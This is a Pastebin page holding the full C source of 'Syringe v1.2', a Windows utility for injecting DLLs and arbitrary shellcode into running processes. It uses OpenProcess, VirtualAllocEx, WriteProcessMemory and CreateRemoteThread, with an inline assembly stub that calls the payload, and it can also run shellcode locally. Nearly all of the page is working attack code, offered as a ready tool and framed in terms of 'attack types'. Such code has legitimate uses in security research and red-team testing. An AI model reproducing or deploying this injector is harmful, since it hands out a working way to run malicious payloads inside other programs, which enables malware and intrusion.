API tools faq
paste
Advertisement
Guest User

Syringe - Dll/Shellcode Injection Too

a guest
Jul 12th, 2011
99
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.59 KB | None | 0 0
raw download clone embed print report
  1. #include <windows.h>
  2. #include <stdio.h>
  3. #include <tlhelp32.h>
  4.  
  5. #define MAXLINE 512
  6. #define CREATE_THREAD_ACCESS (PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ)
  7. #define REMOTE_ASSEMBLY_STUB_LENGTH_RELEASE 32
  8. #define ATTACK_TYPE_DLL_INJECTION 1
  9. #define ATTACK_TYPE_SHELL_CODE_INJECTION 2
  10. #define ATTACK_TYPE_EXECUTE_SHELL_CODE 3
  11.  
  12. int InjectDLL(char *dll, int ProcessID);
  13. int InjectShellcode(char *data, int ProcessID);
  14. int ExecuteShellcode(char *data);
  15. DWORD WINAPI RemoteExecPayloadStub(LPVOID lpParameter);
  16. DWORD WINAPI LocalExecPayloadStub(LPVOID lpParameter);
  17.  
  18. int main(int argc, char* argv[]) {
  19. char dllPath[MAXLINE] = "";
  20. unsigned int pid = 0;
  21. unsigned int injResult;
  22. unsigned char attackType = 0;
  23. unsigned char numargs = 4;
  24. char *usageString = "Syringe v1.2\nA General Purpose DLL & Code Injection Utility\n\nUsage:\n\nInject DLL:\n\tsyringe.exe -1 [ dll ] [ pid ]\n\nInject Shellcode:\n\tsyringe.exe -2 [ shellcode ] [ pid ]\n\nExecute Shellcode:\n\tsyringe.exe -3 [ shellcode ]\n";
  25.  
  26. if (argc < 2) {
  27. printf("%s", usageString);
  28. return 0;
  29. }
  30. if (strncmp(argv[1], "-1", 2) == 0) {
  31. attackType = ATTACK_TYPE_DLL_INJECTION;
  32. } else if (strncmp(argv[1], "-2", 2) == 0) {
  33. attackType = ATTACK_TYPE_SHELL_CODE_INJECTION;
  34. } else if (strncmp(argv[1], "-3", 2) == 0) {
  35. attackType = ATTACK_TYPE_EXECUTE_SHELL_CODE;
  36. numargs = 3;
  37. } else {
  38. printf("%s", usageString);
  39. return 0;
  40. }
  41. if (argc != numargs) {
  42. printf("%s", usageString);
  43. return 0;
  44. }
  45.  
  46. if ((attackType == ATTACK_TYPE_DLL_INJECTION) || (attackType == ATTACK_TYPE_SHELL_CODE_INJECTION)) {
  47. pid = atoi(argv[3]);
  48. if (!pid) {
  49. printf("Invalid Process ID.\n");
  50. return 0;
  51. }
  52. if (attackType == ATTACK_TYPE_DLL_INJECTION) {
  53. GetFullPathNameA(argv[2], MAXLINE, dllPath, NULL);
  54. injResult = InjectDLL(dllPath, pid);
  55. } else if (attackType == ATTACK_TYPE_SHELL_CODE_INJECTION) {
  56. injResult = InjectShellcode(argv[2], pid);
  57. }
  58.  
  59. if (injResult == 0) {
  60. printf("Successfully Injected.\n");
  61. } else {
  62. printf("Failed To Inject. \nError: ");
  63. switch (injResult) {
  64. case 1: { printf("Invalid Process ID.\n"); break; }
  65. case 2: { printf("Could Not Open A Handle To The Process.\n"); break; }
  66. case 3: { printf("Could Not Get The Address Of LoadLibraryA.\n"); break; }
  67. case 4: { printf("Could Not Allocate Memory In Remote Process.\n"); break; }
  68. case 5: { printf("Could Not Write To Remote Process.\n"); break; }
  69. case 6: { printf("Could Not Start The Remote Thread.\n"); break; }
  70. }
  71. }
  72. } else if (attackType == ATTACK_TYPE_EXECUTE_SHELL_CODE) {
  73. ExecuteShellcode(argv[2]);
  74. }
  75. return 0;
  76. }
  77.  
  78. int InjectDLL(char *dll, int ProcessID) {
  79. HANDLE Proc, RemoteThread;
  80. LPVOID RemoteStringPtr, LoadLibAddr;
  81. int writeProcError;
  82.  
  83. if(!ProcessID) {
  84. return 1;
  85. }
  86. Proc = OpenProcess(CREATE_THREAD_ACCESS, FALSE, ProcessID);
  87. if(!Proc) {
  88. return 2;
  89. }
  90. LoadLibAddr = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
  91. if (LoadLibAddr == NULL) {
  92. return 3;
  93. }
  94. RemoteStringPtr = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(dll), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
  95. if (RemoteStringPtr == NULL) {
  96. return 4;
  97. }
  98. writeProcError = WriteProcessMemory(Proc, (LPVOID)RemoteStringPtr, dll, strlen(dll), NULL);
  99. if (writeProcError == 0) {
  100. return 5;
  101. }
  102. RemoteThread = CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddr, (LPVOID)RemoteStringPtr, NULL, NULL);
  103. if (RemoteThread == NULL) {
  104. return 6;
  105. }
  106. CloseHandle(Proc);
  107. return 0;
  108. }
  109.  
  110. int InjectShellcode(char *data, int ProcessID) {
  111. HANDLE Proc, RemoteThread;
  112. void *RemoteStringPtr;
  113. void *RemoteStubPtr;
  114. int writeProcError;
  115. unsigned long oldprot;
  116.  
  117. // Step 1, get a handle to a process
  118. if(!ProcessID) {
  119. return 1;
  120. }
  121. Proc = OpenProcess(CREATE_THREAD_ACCESS, FALSE, ProcessID);
  122. if(!Proc) {
  123. return 2;
  124. }
  125.  
  126. // Step 2, write the shellcode to the remote process
  127. RemoteStringPtr = VirtualAllocEx(Proc, NULL, (strlen(data) + 1), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  128. if (RemoteStringPtr == NULL) {
  129. return 4;
  130. }
  131. writeProcError = WriteProcessMemory(Proc, RemoteStringPtr, data, strlen(data), NULL);
  132. if (writeProcError == 0) {
  133. return 5;
  134. }
  135.  
  136. // Step 3, write the assembly stub that will call the shellcode in the remote process
  137. RemoteStubPtr = VirtualAllocEx(Proc, NULL, REMOTE_ASSEMBLY_STUB_LENGTH_RELEASE, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  138. if (RemoteStubPtr == NULL) {
  139. return 4;
  140. }
  141. VirtualProtect(RemoteExecPayloadStub, REMOTE_ASSEMBLY_STUB_LENGTH_RELEASE, PAGE_EXECUTE_READWRITE, &oldprot);
  142. writeProcError = WriteProcessMemory(Proc, RemoteStubPtr, RemoteExecPayloadStub, REMOTE_ASSEMBLY_STUB_LENGTH_RELEASE, NULL);
  143. if (writeProcError == 0) {
  144. return 5;
  145. }
  146.  
  147. // Step 4, start the assembly stub in via a call to CreateRemoteThread()
  148. RemoteThread = CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)RemoteStubPtr, (LPVOID)RemoteStringPtr, NULL, NULL);
  149. if (RemoteThread == NULL) {
  150. return 6;
  151. }
  152. CloseHandle(Proc);
  153.  
  154. // Step 5, Profit.
  155. return 0;
  156. }
  157.  
  158. int ExecuteShellcode(char *data) {
  159. HANDLE LocalThread;
  160. int tid;
  161. void *StringPtr;
  162. StringPtr = VirtualAlloc(NULL, (strlen(data) + 1), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  163. strncpy(StringPtr, data, strlen(data));
  164. LocalThread = CreateThread(NULL, 0, LocalExecPayloadStub, StringPtr, 0, &tid);
  165. printf("Waiting For Shellcode To Return... ");
  166. WaitForSingleObject(LocalThread, INFINITE);
  167. printf("Done.\n");
  168. return 0;
  169. }
  170.  
  171. DWORD WINAPI RemoteExecPayloadStub(LPVOID lpParameter) {
  172. __asm {
  173. mov eax, [lpParameter]
  174. call eax
  175.  
  176. // Exit function is thread, don't mess this up
  177. push 0
  178. call ExitThread
  179. }
  180. return 0;
  181. }
  182.  
  183. DWORD WINAPI LocalExecPayloadStub(LPVOID lpParameter) {
  184. __try {
  185. __asm {
  186. mov eax, [lpParameter]
  187. call eax
  188.  
  189. push 0
  190. call ExitThread
  191. }
  192. }
  193. __except(EXCEPTION_EXECUTE_HANDLER) {
  194. }
  195.  
  196. return 0;
  197. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!